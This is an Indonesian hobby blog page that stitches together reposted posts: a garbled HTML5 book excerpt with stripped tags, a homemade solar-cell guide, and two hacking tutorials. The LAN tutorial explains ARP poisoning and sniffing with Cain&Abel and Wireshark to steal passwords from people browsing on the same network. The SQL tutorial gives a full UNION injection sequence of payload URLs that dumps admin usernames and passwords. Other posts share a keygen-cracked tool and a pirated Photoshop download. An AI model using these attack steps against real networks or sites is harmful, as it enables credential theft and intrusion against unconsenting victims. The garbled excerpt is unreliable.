Featured Contents

Sample Post 1

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. [...]

Sample Post 2

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. [...]

Sample Post 3

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. [...]

Sample Post 4

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. [...]

Latest Posts

0

The Essential Guide to HTML5 chapter 1 part 1 (Author Jeanine Meyer)

boyzz Rabu, 18 Mei 2011
The Basics
In this chapter, we will cover
• the basic structure of an HTML document
• the html, head, title, script, style, body, img, and a elements
• a Cascading Style Sheet (CSS) example
• a JavaScript code example, using Date and document.write
Introduction
Hypertext Markup Language (HTML) is the language for delivering content on the Web. HTML is not owned
by anyone, but is the result of people working in many countries and many organizations to define the
features of the language. An HTML document is a text document which you can produce using any text
editor. HTML documents contain elements surrounded by tags—text that starts with a < symbol and ends
with a > symbol. An example of a tag is . This particular tag will display the image
held in the file home.gif. These tags are the markup. It is through the use of tags that hyperlinks, images,
and other media are included in web pages.
Basic HTML can include directives for formatting in a language called Cascading Style Sheets (CSS) and
programs for interaction in a language called JavaScript. Browsers, such as Firefox and Chrome, interpret
the HTML along with any CSS and JavaScript to produce what we experience when we visit a web site.
HTML holds the content of the web site, with tags providing information on the nature and structure of the
content as well as references to images and other media. CSS specifies the formatting. The same content
can be formatted in different ways. JavaScript is a programming language that��s used to make the web
site dynamic and interactive. In all but the smallest working groups, different people may be responsible
for the HTML, CSS, and JavaScript, but it��s always a good idea to have a basic understanding of how
these different tools work together. If you are already familiar with the basics of HTML and how CSS and
JavaScript can be added together, you may want to skip ahead to the next chapter. Still, it may be worth
casting your eye over the content in this chapter, to make sure you are up to speed on everything before
we start on the first core examples

The latest version of HTML (and its associated CSS and JavaScript) is HTML5. It is generating
considerable excitement because of features such as the canvas for displaying pictures and animation;
support for video and audio; and new tags for defining common document elements such as header,
section, and footer. You can create a sophisticated, highly interactive web site with the new HTML5. As
of this writing, not all browsers accept all the features, but you can get started learning HTML5, CSS, and
JavaScript now. Learning JavaScript will introduce you to general programming concepts that will be
beneficial if you try to learn any other programming language or if you work with programmers as part of a
team.
The approach I��ll use in this book is to explain HTML5, CSS, and JavaScript concepts in the context of
specific examples, most of which will be familiar games. Along the way, I��ll use small examples to
demonstrate specific features. Hopefully, this will help you both understand what you want to do and
appreciate how to do it. You will know where we are headed as I explain the concepts and details.
The task for this chapter is to build a web page of links to other web sites. In this way, you��ll get a basic
understanding of the structure of an HTML document, with a small amount of CSS code and JavaScript
code. For this and other examples, please think of how to make the project meaningful to you. The page
could be a list of your own projects, favorite sites, or sites on a particular topic. For each site, you��ll see
text and a hyperlink. The second example includes some extra formatting in the form of boxes around the
text, pictures, and the day's date and time. Figure 1-1 and Figure 1-2 show the different examples I��ve
created.
 
Figure 1-1. An annotated list of games


Figure 1-2. Favorite sites, with extra formatting
When you reload the Favorite Sites page, the date and time will change to the current date and time
according to your computer.
Critical requirements
The requirements for the list of links application are the very fundamental requirements for building a web
page containing text, links, and images. For the example shown in Figure 1-1, each entry appears as a
paragraph. In the example shown in Figure 1-2, in contrast, each entry has a box around it. The second
example also includes images and a way to obtain the current day, date, and time. Later applications will
require more discussion, but for this one we��ll go straight to how to implement it using HTML, CSS, and
JavaScript.
CHAPTER 1
4
HTML5, CSS, and JavaScript features
As I noted, HTML documents are text, so how do we specify links, pictures, formatting, and coding? The
answer is in the markup, that is, the tags. Along with the HTML that defines the content, you��ll typically
find CSS styles, which can be specified either inside the HTML document or in an external document. You
might also include JavaScript for interactivity, again specified in the HTML document or in an external
document. We��ll start with a look at how you can build simple HTML tags, and how you can add inline CSS
and JavaScript all within the same document.
Basic HTML structure and tags
An HTML element begins with a starting tag, which is followed by the element content and an ending tag.
The ending tag includes a / symbol followed by the element type, for example /head. Elements can be
nested within elements. A standard HTML document looks like this:





This will appear as is.


Note that I��ve indented the nested tags here to make them more obvious, but HTML itself ignores this
indentation (or whitespace, as it��s known), and you don��t need to add it to your own files. In fact, for most
of the examples throughout this book I won��t be indenting my code.
This document consists of the html element, indicated by the starting tag and ending with the
closing tag: .
HTML documents typically have a head and a body element, as this one has. This head element contains
one element, title. The HTML title shows up different places in different browsers. Figure 1-3 shows the
title, "Very Simple Example" at the top-left portion of the screen and also on a tab in Firefox.




0

Cara Membuat Solar Cell Sendiri

boyzz Jumat, 30 Juli 2010
Bagaimana Membuat Solar Cell Sendiri 2
I made a more portable version of the solar cell in a flat panel form. I used the clear plastic top from a plastic CD jewel case as the window, and lots of silicone rubber glue to both attach the pieces together and to insulate them from each other.
The first step is to make a cuprous oxide plate like we did in the first solar cell. This time I sanded one corner clean all the way down to the shiny copper, and soldered an insulated copper wire to it for the negative lead.
The positive plate is a U shaped piece cut from the copper sheeting, a little bit larger than the cuprous oxide plate, with the cutout portion of the U a little bit smaller than the cuprous oxide plate. Another insulated copper wire is soldered to one corner of the U.
The first step in construction is to glue the U shaped copper plate to the plastic window. Use plenty of silicone glue, so the saltwater won't leak out. Make sure that the solder connection is either completely covered with glue, or is outside of the glue U, as shown in the photo (completely covered in glue is best)
The photo below shows the back side of the solar cell (the side not facing the sun) at this point in the construction.
The next step is to lay a good size bead of glue onto the U shaped clean copper plate. This layer will act as an insulator between the clean copper plate and the cuprous oxide plate, and must be thick enough to leave some room for the saltwater. Again, not all of the copper is covered, so there will be plenty of copper in contact with the saltwater.

Gently press the cuprous oxide plate onto this layer of glue. You should press hard enough to make sure the glue seals off any gaps, but not so hard that the two plates touch.

The photo below shows the back side of the solar cell (the side not facing the sun) at this point in the construction
The photo below shows the front side of the solar cell (the side that will face the sun) at this point in the construction. Notice that the silicone glue does not completely cover the copper, since some of the copper must eventually be in contact with the saltwater.
The next step is to lay a good size bead of glue onto the U shaped clean copper plate. This layer will act as an insulator between the clean copper plate and the cuprous oxide plate, and must be thick enough to leave some room for the saltwater. Again, not all of the copper is covered, so there will be plenty of copper in contact with the saltwater.

Gently press the cuprous oxide plate onto this layer of glue. You should press hard enough to make sure the glue seals off any gaps, but not so hard that the two plates touch.

The photo below shows the back side of the solar cell (the side not facing the sun) at this point in the construction
 The photo below shows the front side of the solar cell (the side that will face the sun) at this point in the construction. Note that I added extra glue to form a funnel at the top to allow the saltwater to be added.


You can click on the photo above to get a bigger picture.
Not shown in the photo is a generous extra bead of glue all around the outside of the plates, to ensure that no saltwater will leak out. Allow the glue to cure before going on to the next step
Next, use a large eyedropper to add the saltwater. Fill the cell up almost to the top of the copper plate, so it almost spills out. Then seal the funnel with another generous bead of glue, and allow the glue to cure at least a half hour
In the photo above you can see the flat panel solar cell in action in the bright sun. It is delivering about 36 microamperes of current. You can also see the extra bead of glue around the edges of the plates, and filling the top of the funnel.
 Finally, another shot of the author's shadow. Note that the meter now reads about 4 microamperes, since no sunlight is falling on it.
 Science is for every one.
Silahkan menterjemahkan artikel ini dan kirimkan kembali untuk kami publish sehingga bermanfaat bagi yang membutuhkannya
Terima kasih.

sumber http://www.alpensteel.com/article/46-102-energi-matahari--surya--solar/229--cara-membuat-solar-cell-sendiri2.html
0

Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)

boyzz Senin, 28 Juni 2010
Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda


Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:

http://www.wireshark.org/download.html
http://www.oxid.it/cain.html

Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).
sumber:http://wanbule.wordpress.com/2009/01/02/tutorial-hacking-untuk-pemula/
0

TUTORIAL SQL BUAT PEMULA

boyzz
kyk nya forum ini perlu ini deh, coz blum ada yg sharing yg kayak gini, misal kalo ada yg sharing kayak gini bearti saya repost, ya tinggal di delete aja

topick ini hasil copy paste saya di forum sebelah, tetapi biasa nya tiap hari saya memakai technik ini

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" (tanpa tanda " )untuk melihat apakah ada pesan error.
contoh:

[site]/berita.php?id=100' atau
[site]/berita.php?id=-100

==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:

Code: Select all
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*


ceklah secara step by step (satupersatu)...
misal:

Code: Select all
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--


sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


===========
=step Empat:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

Code: Select all
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= step Lima: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

Code: Select all
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://palembang.bforum.biz/ascii-h4.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

Code: Select all
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--

============
=step Enam:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Code: Select all
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--


contoh kata yang keluar adalah id,username,password

Code: Select all
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--


==============
= step Tujuh:=
==============

tahap terakhir mencari halam admin atau login .


Silahkan DI pelajari Kaka Smile .


thanks to gonzhack

credits: Orangb390

sumber:http://forumuntukmu.logu2.com/hack-f5/tutorial-sql-buat-pemula-t7.htm
0

Enkripsi Halaman Web dengan Encrypt Web Pro

boyzz Sabtu, 05 Juni 2010
Halaman web adalah salah satu file yang umumnya terbuka. Siapa saja dapat melihat kode-kode HTML ataupun PHP dan script-script yang tertanam dalam file tersebut. Namun bagaimana jika kebijakan atau idealisme anda mengharuskan anda harus memproteksi file HTML anda? Bagaimana jika kebijakan yang harus anda ambil adalah mengenkripsi file-file web anda.
Ada satu solusi mudah yang ditawarkan di environment windows. Sudah banyak beredar software web encrypt, HTML encrypt ataupun PHP encrypt, yang tujuannya hanya satu hal mengenkripsi file anda supaya tak mudah ditengok oleh orang. Kali ini dotexe berkesempatan membagi satu software encrypt web yang patut anda coba, tak tanggung-tanggung, kami kasih versi PRO berikut keygennya. [ Just for Learn ].
Sebelumnya Downloadlah filenya:
http://rapidshare.com/files/216106192/Encrypt.Web.Pro.v1.5.WinALL.Regged-CzW.rar
Baca saja file README dan HELPnya, dijamin mudah. Kami cantumkan pula preview software ini:
Encrypt Web Pro is a software tool to protect your web pages. It encrypts your email addresses, script code, links, text, graphics or all HTML source code to make them unreadable but work normally in web browsers.
Thus others can’t extract your email addresses, steal your script code and steal unique web design etc.
Additionally, Encrypt Web Pro also have many other protect features for you to use, such as “Disable right mouse click”, “Disable text select”, “Disable page printing”, “Disable off-line use”, “Disable links display in status bar”, “Disable printscreen”, “Kill frame”, “Disable drag and drop”, “Location lock”, “Referrer lock” etc.
To encrypt files with this tool, what you need to do is just clicking a few buttons.
Encrypt Web Pro Features:
- Encrypt and protect html pages, web pages and whole web site in minutes.
- Encrypt email addresses, script code, links, text, graphics or all HTML source code.
- Encrypted web pages work normally on web browsers, but their encrypted source code can’t be read and reused.
- Five encrypt modes for select to meet all your encryption needs.
- Many html protect features for select such as “Disable right mouse click”, “Disable text select”,
- “Disable page printing”, “Disable off-line use”, “Disable links display in status bar”, “Disable printscreen”,
- “Kill frame”, “Disable drag and drop”, “Location lock”, “Referrer lock” etc.
- Meta protect features such as “Disable page caching”, “Make page expire immediately”, “Disable image toolbar”, “Disable smart tags” etc.
- Encrypted web pages are independent of OS, web servers and web browsers.
- Can encrypt almost all languages chaset of files in the world.
- Easy to use and powerful enough, what you need to do is just clicking a few buttons.
Screenshoot:
0

kabar gembira buat anda yang menggunakan im2

boyzz Kamis, 13 Mei 2010
mungkin saja tips ini sudah lama, tapi tip ini baru saja saya dapat.
tahukah anda? kalau im2 bisa multi account. maksudnya satu acoount bisa di pakai oleh beberapa orang/pc.
nah jika anda mempunyai account im2 yang Rp.100.000/bulan, jika di pakai oleh 5 pc. jadi lebih murah. yaitu Rp.20.000/bulan.
bagi anda yang punya accout im2 berbagilah. (khususnya kepada Admin blog ini hehehe)
0

photoshop cs5 portable

 pad saat sya iseng-iseng browsing gak sengaja nemu ini
Adobe photoshop cs5 ynag baru aja di rilis, yapi kayuanya belum ada di indonesia. sekarang udah ada versi portbale. bagi yang berminat sialahkan download di

http://rapidshare.com/files/383752026/Photoshop_Portable_12.0_en-fr-de-es-it-ru-zh-tw.paf.exe
 
Copyright 2010 Info Teknologi